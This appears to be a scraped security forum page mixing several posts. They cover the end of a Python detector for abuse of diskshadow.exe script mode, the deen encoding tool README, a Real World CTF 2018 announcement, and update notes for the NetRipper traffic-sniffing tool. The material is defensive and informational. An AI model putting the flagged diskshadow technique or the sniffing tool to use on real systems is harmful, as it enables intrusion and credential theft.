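     "cmdline": r"diskshadow.exe /s c:\test\diskshadow.txt",
     "integrity": "Medium"},
]
for hit in flag_diskshadow(events):
    print(hit["image"], hit["reasons"])
```

In practice you would also correlate child processes spawned by diskshadow.exe, since (as shown earlier) it stays the parent of anything launched via EXEC.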
-
deen

An application that allows you to apply encoding, compression and hashing to generic input data. It is meant to be a handy tool for quick encoding/decoding tasks for data to be used in other applications. It aims to be a lightweight alternative to other tools that might take a long time to start up and should not have too many dependencies. It includes a GUI for easy interaction and integration in common workflows, as well as a CLI that might be useful for automation tasks.

Usage

See the wiki for basic and more advanced usage examples.

Installation

Install via pip:

pip3 install -r requirements.txt
pip3 install .

After installation, just run:

deen

Note: If the installation fails with an error like "Could not find a version that satisfies the requirement PyQt5", then you are trying to install deen via pip on a version of Python < 3.5. In this case, you cannot install PyQt5 via pip. You have to install PyQt5 separately, e.g. via your package manager (e.g. pacman -S python2-pyqt5 on Arch Linux for Python 2).

Packages

There is a deen-git package available in the Arch User Repository (AUR).

Compatibility

The code should be compatible with Python 2 (at least 2.7.x) and Python 3. However, deen is mainly developed for Python 3 and some features may be temporarily broken in Python 2. It is strongly recommended to use deen with Python 3. The GUI should run on most operating systems supported by Python. It was tested on Linux and Windows. Hopefully compatibility for different Python versions and operating systems will improve in the future. Feel free to test it and create issues!

Some transformers will only be available in more recent versions of Python. This includes e.g. Base85 (Python 3.4 or newer) or the BLAKE2b and BLAKE2s hash algorithms (Python 3.6 or newer).

Source: https://github.com/takeshixx/deen
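deen's core idea — chaining generic transforms over the same byte buffer — can be sketched with the standard library alone. This illustrates the concept, not deen's internal API; the transform names and registry structure here are made up for the example:

```python
import base64
import hashlib
import zlib

# Each transform is a (encode, decode) pair of bytes -> bytes callables,
# so they compose freely in either direction.
TRANSFORMS = {
    "b64": (base64.b64encode, base64.b64decode),
    "deflate": (zlib.compress, zlib.decompress),
}

def apply_chain(data, chain):
    """Apply named transforms left to right, e.g. ["deflate", "b64"]."""
    for name in chain:
        data = TRANSFORMS[name][0](data)
    return data

def reverse_chain(data, chain):
    """Undo apply_chain: decode in reverse order."""
    for name in reversed(chain):
        data = TRANSFORMS[name][1](data)
    return data

payload = b"some data to be used in another application"
encoded = apply_chain(payload, ["deflate", "b64"])
assert reverse_chain(encoded, ["deflate", "b64"]) == payload
# Hashing is one-way, so it sits outside the reversible chain.
print(encoded.decode(), hashlib.sha256(payload).hexdigest()[:16])
```

Keeping every transform as a bytes-to-bytes pair is what makes a GUI/CLI like deen's possible: the same pipeline works regardless of which encodings the user stacks.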
-
<Registration Deadline>
JUL 28 10:00 AM, 2018

<Qualification>
Online Jeopardy (All challenges are built on top of real world applications)
JUL 28 10:00 AM ~ JUL 30 10:00 AM, 2018 (GMT+8, 48 hours)

<Final>
Onsite Jeopardy (All challenges are built on top of real world applications)
SEP 15 ~ SEP 18, 2018 (GMT+8, 48 hours)
Venue: TBC, China

Top 20 international teams (5 players per team) from the qualification round will be invited to participate in the on-site CTF Finals. We will see the world's best teams competing for the 2018 REAL WORLD CTF Championship.

Link: https://realworldctf.com/
-
(paper) A systematic review of fuzzing techniques
Nytro replied to QuoVadis's topic in Tutoriale in engleza
Cool, where do you get these from? -
[RST] NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to Nytro's topic in Proiecte RST
NetRipper - Added support for cross-compilation on Linux - https://github.com/NytroRST/NetRipper -
[RST] NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to Nytro's topic in Proiecte RST
NetRipper - Added support for Chrome 67 (32 and 64 bits) https://github.com/NytroRST/NetRipper